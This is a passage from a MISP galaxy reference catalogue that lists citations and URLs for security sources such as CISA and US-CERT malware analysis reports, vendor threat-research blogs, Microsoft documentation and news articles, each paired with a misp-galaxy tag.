The tag is: misp-galaxy:references="CISA Zebrocy Oct 2020"

Table 14347. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

CISA Supernova Jan 2021

CISA. (2021, January 27). Malware Analysis Report (AR21-027A). Retrieved February 22, 2021.

The tag is: misp-galaxy:references="CISA Supernova Jan 2021"

Table 14348. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

UK NCSC Jaguar Tooth April 18 2023

National Cyber Security Centre. (2023, April 18). Malware Analysis Report: Jaguar Tooth. Retrieved August 23, 2023.

The tag is: misp-galaxy:references="UK NCSC Jaguar Tooth April 18 2023"

Table 14349. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jaguar-tooth/NCSC-MAR-Jaguar-Tooth.pdf

US-CERT SHARPKNOT June 2018

US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.

The tag is: misp-galaxy:references="US-CERT SHARPKNOT June 2018"

Table 14350. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

US-CERT Bankshot Dec 2017

US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.

The tag is: misp-galaxy:references="US-CERT Bankshot Dec 2017"

Table 14351. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF

US-CERT Volgmer 2 Nov 2017

US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="US-CERT Volgmer 2 Nov 2017"

Table 14352. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF

US-CERT HARDRAIN March 2018

US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="US-CERT HARDRAIN March 2018"

Table 14353. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

US-CERT BADCALL

US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="US-CERT BADCALL"

Table 14354. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF

CISA MAR SLOTHFULMEDIA October 2020

DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.

The tag is: misp-galaxy:references="CISA MAR SLOTHFULMEDIA October 2020"

Table 14355. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

Kroll RawPOS Jan 2017

Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit. Retrieved October 4, 2017.

The tag is: misp-galaxy:references="Kroll RawPOS Jan 2017"

Table 14356. Table References

Links

https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware

VMRay OSAMiner dynamic analysis 2021

VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.

The tag is: misp-galaxy:references="VMRay OSAMiner dynamic analysis 2021"

Table 14357. Table References

Links

https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/

Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018

Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018"

Table 14358. Table References

Links

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

Alperovitch Malware

Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="Alperovitch Malware"

Table 14359. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

Chrome Extension C2 Malware

Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Chrome Extension C2 Malware"

Table 14360. Table References

Links

https://kjaer.io/extension-malware/

FireEye Kevin Mandia Guardrails

Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="FireEye Kevin Mandia Guardrails"

Table 14361. Table References

Links

https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/

TechRepublic M-Trends 2023

Karl Greenberg. (2023, April 20). Malware is proliferating, but detection measures bear fruit: Mandiant. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="TechRepublic M-Trends 2023"

Table 14362. Table References

Links

https://www.techrepublic.com/article/mandiant-malware-proliferating/

CTU BITS Malware June 2016

Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="CTU BITS Malware June 2016"

Table 14363. Table References

Links

https://www.secureworks.com/blog/malware-lingers-with-bits

CyberBit System Calls

Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CyberBit System Calls"

Table 14364. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/

Malware Monday VBE

Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Malware Monday VBE"

Table 14365. Table References

Links

https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16

RSAC 2015 San Francisco Patrick Wardle

Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="RSAC 2015 San Francisco Patrick Wardle"

Table 14366. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Malware Persistence on OS X

Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="Malware Persistence on OS X"

Table 14367. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

FireEye Hijacking July 2010

Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="FireEye Hijacking July 2010"

Table 14368. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html

Mondok Windows PiggyBack BITS May 2007

Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Mondok Windows PiggyBack BITS May 2007"

Table 14369. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

Conficker Nuclear Power Plant

Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl’s 30th Anniversary. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Conficker Nuclear Power Plant"

Table 14370. Table References

Links

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

MMPC ISAPI Filter 2012

MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="MMPC ISAPI Filter 2012"

Table 14371. Table References

Links

https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx

Leonardo Turla Penquin May 2020

Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.

The tag is: misp-galaxy:references="Leonardo Turla Penquin May 2020"

Table 14372. Table References

Links

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

Malware System Language Check

Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Malware System Language Check"

Table 14373. Table References

Links

https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/

JPCert TSCookie March 2018

Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert TSCookie March 2018"

Table 14374. Table References

Links

https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html

Symantec BITS May 2007

Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Symantec BITS May 2007"

Table 14375. Table References

Links

https://www.symantec.com/connect/blogs/malware-update-windows-update

JPCert BlackTech Malware September 2019

Tomonaga, S. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="JPCert BlackTech Malware September 2019"

Table 14376. Table References

Links

https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

Unit 42 Rocke January 2019

Xingyu, J. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Unit 42 Rocke January 2019"

Table 14377. Table References

Links

https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/

Manage-bde.wsf - LOLBAS Project

LOLBAS. (2018, May 25). Manage-bde.wsf. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Manage-bde.wsf - LOLBAS Project"

Table 14378. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/

Microsoft Manage Device Identities

Microsoft. (2022, February 18). Manage device identities by using the Azure portal. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Microsoft Manage Device Identities"

Table 14379. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal

Microsoft MOF May 2018

Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft MOF May 2018"

Table 14380. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-

Microsoft Inbox Rules

Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.

The tag is: misp-galaxy:references="Microsoft Inbox Rules"

Table 14381. Table References

Links

https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59

Google Cloud Just in Time Access 2023

Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Google Cloud Just in Time Access 2023"

Table 14382. Table References

Links

https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project

Microsoft Manage Mail Flow Rules 2023

Microsoft. (2023, February 22). Manage mail flow rules in Exchange Online. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Manage Mail Flow Rules 2023"

Table 14383. Table References

Links

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules

Office 365 Partner Relationships

Microsoft. (2022, March 4). Manage partner relationships. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 365 Partner Relationships"

Table 14384. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide

TechNet Trusted Publishers

Microsoft. (n.d.). Manage Trusted Publishers. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="TechNet Trusted Publishers"

Table 14385. Table References

Links

https://technet.microsoft.com/en-us/library/cc733026.aspx

Microsoft Enable Cred Guard April 2017

Lich, B., Tobin, J., Hall, J. (2017, April 5). Manage Windows Defender Credential Guard. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Enable Cred Guard April 2017"

Table 14386. Table References

Links

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage

Outlook File Sizes

O’Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Outlook File Sizes"

Table 14387. Table References

Links

https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/

Microsoft Managing WebDAV Security

Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Microsoft Managing WebDAV Security"

Table 14388. Table References

Links

https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx

Mandiant M Trends 2011

Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.

The tag is: misp-galaxy:references="Mandiant M Trends 2011"

Table 14389. Table References

Links

https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf

Mandiant M Trends 2016

Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Mandiant M Trends 2016"

Table 14390. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

FireEye APT35 2018

Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="FireEye APT35 2018"

Table 14391. Table References

Links

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

Microsoft Manifests

Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft Manifests"

Table 14392. Table References

Links

https://msdn.microsoft.com/en-US/library/aa375365

MSDN Manifests

Microsoft. (n.d.). Manifests. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="MSDN Manifests"

Table 14393. Table References

Links

https://msdn.microsoft.com/en-us/library/aa375365

Wikipedia Man in the Browser

Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Wikipedia Man in the Browser"

Table 14394. Table References

Links

https://en.wikipedia.org/wiki/Man-in-the-browser

Kaspersky Encyclopedia MiTM

Kaspersky IT Encyclopedia. (n.d.). Man-in-the-middle attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="Kaspersky Encyclopedia MiTM"

Table 14395. Table References

Links

https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/

Rapid7 MiTM Basics

Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.

The tag is: misp-galaxy:references="Rapid7 MiTM Basics"

Table 14396. Table References

Links

https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

Praetorian TLS Downgrade Attack 2014

Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="Praetorian TLS Downgrade Attack 2014"

Table 14397. Table References

Links

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

mitm_tls_downgrade_att

Praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.

The tag is: misp-galaxy:references="mitm_tls_downgrade_att"

Table 14398. Table References

Links

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

InsiderThreat ChangeNTLM July 2017

Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="InsiderThreat ChangeNTLM July 2017"

Table 14399. Table References

Links

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

Kaspersky ManOnTheSide

Starikova, A. (2023, February 14). Man-on-the-side – peculiar attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="Kaspersky ManOnTheSide"

Table 14400. Table References

Links

https://usa.kaspersky.com/blog/man-on-the-side/27854/

CrowdStrike Manufacturing Threat July 2020

Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="CrowdStrike Manufacturing Threat July 2020"

Table 14401. Table References

Links

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

US-CERT TYPEFRAME June 2018

US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.

The tag is: misp-galaxy:references="US-CERT TYPEFRAME June 2018"

Table 14402. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

US-CERT KEYMARBLE Aug 2018

US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.

The tag is: misp-galaxy:references="US-CERT KEYMARBLE Aug 2018"

Table 14403. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

US-CERT HOPLIGHT Apr 2019

US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="US-CERT HOPLIGHT Apr 2019"

Table 14404. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

US-CERT HOTCROISSANT February 2020

US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="US-CERT HOTCROISSANT February 2020"

Table 14405. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/ar20-045d

CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020

USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.

The tag is: misp-galaxy:references="CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020"

Table 14406. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b

CISA MAR-10292089-1.v2 TAIDOOR August 2021

CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="CISA MAR-10292089-1.v2 TAIDOOR August 2021"

Table 14407. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a

US-CERT BLINDINGCAN Aug 2020

US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.

The tag is: misp-galaxy:references="US-CERT BLINDINGCAN Aug 2020"

Table 14408. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

CISA SoreFang July 2016

CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="CISA SoreFang July 2016"

Table 14409. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a

CISA WellMess July 2020

CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.

The tag is: misp-galaxy:references="CISA WellMess July 2020"

Table 14410. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

CISA WellMail July 2020

CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="CISA WellMail July 2020"

Table 14411. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c

CISA EB Aug 2020

Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="CISA EB Aug 2020"

Table 14412. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

CISA HatMan

CISA. (2019, February 27). MAR-17-352-01 HatMan-Safety System Targeted Malware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="CISA HatMan"

Table 14413. Table References

Links

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

Outflank MotW 2020

Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Outflank MotW 2020"

Table 14414. Table References

Links

https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/

Masquerads-Guardio

Tal, Nati. (2022, December 28). “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Masquerads-Guardio"

Table 14415. Table References

Links

https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

CNET Leaks

Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="CNET Leaks"

Table 14416. Table References

Links

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

ArsTechnica Great Firewall of China

Goodin, D. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ArsTechnica Great Firewall of China"

Table 14417. Table References

Links

https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/

Europol Cobalt Mar 2018

Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Europol Cobalt Mar 2018"

Table 14418. Table References

Links

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

LOLBAS Mavinject

LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="LOLBAS Mavinject"

Table 14419. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mavinject/

Mavinject Functionality Deconstructed

Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Mavinject Functionality Deconstructed"

Table 14420. Table References

Links

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

Sophos Maze VM September 2020

Brandt, A., Mackenzie, P. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="Sophos Maze VM September 2020"

Table 14421. Table References

Links

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

mbed-crypto

ARMmbed. (2018, June 21). Mbed Crypto. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="mbed-crypto"

Table 14422. Table References

Links

https://github.com/ARMmbed/mbed-crypto

McAfee REvil October 2019

Saavedra-Morales, J., et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="McAfee REvil October 2019"

Table 14423. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

McAfee Sodinokibi October 2019

McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="McAfee Sodinokibi October 2019"

Table 14424. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

McAfee Sandworm November 2013

Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="McAfee Sandworm November 2013"

Table 14425. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2

McAfee Honeybee

Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="McAfee Honeybee"

Table 14426. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

Secureworks MCMD July 2019

Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Secureworks MCMD July 2019"

Table 14427. Table References

Links

https://www.secureworks.com/research/mcmd-malware-analysis

Purves Kextpocalypse 2

Richard Purves. (2017, November 9). MDM and the Kextpocalypse. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Purves Kextpocalypse 2"

Table 14428. Table References

Links

https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/

MDSec Brute Ratel August 2022

Chell, D. PART 3: How I Met Your Beacon – Brute Ratel. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="MDSec Brute Ratel August 2022"

Table 14429. Table References

Links

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

Secureworks NICKEL ACADEMY Dec 2017

Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Secureworks NICKEL ACADEMY Dec 2017"

Table 14430. Table References

Links

https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing

HC3 Analyst Note MedusaLocker Ransomware February 2023

Health Sector Cybersecurity Coordination Center (HC3). (2023, February 24). MedusaLocker Ransomware. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="HC3 Analyst Note MedusaLocker Ransomware February 2023"

Table 14431. Table References

Links

https://www.hhs.gov/sites/default/files/medusalocker-ransomware-analyst-note.pdf

Cybereason Nocturnus MedusaLocker 2020

Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Cybereason Nocturnus MedusaLocker 2020"

Table 14432. Table References

Links

https://www.cybereason.com/blog/medusalocker-ransomware

Bleeping Computer Medusa Ransomware March 12 2023

Lawrence Abrams. (2023, March 12). Medusa ransomware gang picks up steam as it targets companies worldwide. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Bleeping Computer Medusa Ransomware March 12 2023"

Table 14433. Table References

Links

https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/

CyberScoop Babuk February 2021

Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="CyberScoop Babuk February 2021"

Table 14434. Table References

Links

https://www.cyberscoop.com/babuk-ransomware-serco-attack/

CrowdStrike Stardust Chollima Profile April 2018

Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike Stardust Chollima Profile April 2018"

Table 14435. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/

CrowdStrike VOODOO BEAR

Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="CrowdStrike VOODOO BEAR"

Table 14436. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/

Crowdstrike MUSTANG PANDA June 2018

Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="Crowdstrike MUSTANG PANDA June 2018"

Table 14437. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

CrowdStrike VENOMOUS BEAR

Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="CrowdStrike VENOMOUS BEAR"

Table 14438. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/

Crowdstrike Helix Kitten Nov 2018

Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.

The tag is: misp-galaxy:references="Crowdstrike Helix Kitten Nov 2018"

Table 14439. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

Cloudflare Memcrashed Feb 2018

Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="Cloudflare Memcrashed Feb 2018"

Table 14440. Table References

Links

https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/

Github Mempdump

DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Github Mempdump"

Table 14441. Table References

Links

https://github.com/DiabloHorn/mempdump

Palo Alto menuPass Feb 2017

Miller-Osborn, J. and Grunzweig, J. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Palo Alto menuPass Feb 2017"

Table 14442. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

FireEye MESSAGETAP October 2019

Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages? Retrieved May 11, 2020.

